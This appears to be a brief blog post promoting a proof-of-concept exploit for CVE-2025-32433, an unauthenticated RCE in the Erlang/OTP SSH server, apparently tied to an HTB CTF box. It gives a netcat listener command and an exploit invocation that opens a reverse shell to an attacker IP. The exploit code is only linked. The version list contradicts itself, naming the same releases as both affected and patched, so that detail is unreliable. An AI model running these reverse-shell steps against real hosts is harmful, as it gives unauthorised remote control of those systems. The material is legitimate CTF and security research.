CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

Posted Sep 7, 2025

By dollarboysushil

1 min read

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

Overview

PoC showing unauthenticated remote code execution in Erlang/OTP SSH server.
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

CVE: CVE-2025-32433
CVSS Score: 10.0 (Critical)
Affected Versions:
- OTP-27.3.3 and earlier
- OTP-26.2.5.11 and earlier
- OTP-25.3.2.20 and earlier

This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

References

Usage

Github Repo link

https://github.com/dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

Listener Setup:

nc -lvnp 1234

Run Exploit:

        
      
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>

--rhost : Target IP
--rport : Target SSH port
--lhost : Your IP for reverse shell
--lport : Your listener port

Disclaimer

This repository is for educational purposes only. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.

RCE, cve, CVE-2025-32433

soulmate htb linux ctf CVE-2025-32433 cve unauthenticated rce Erlang-OTP

This post is licensed under CC BY 4.0 by the author.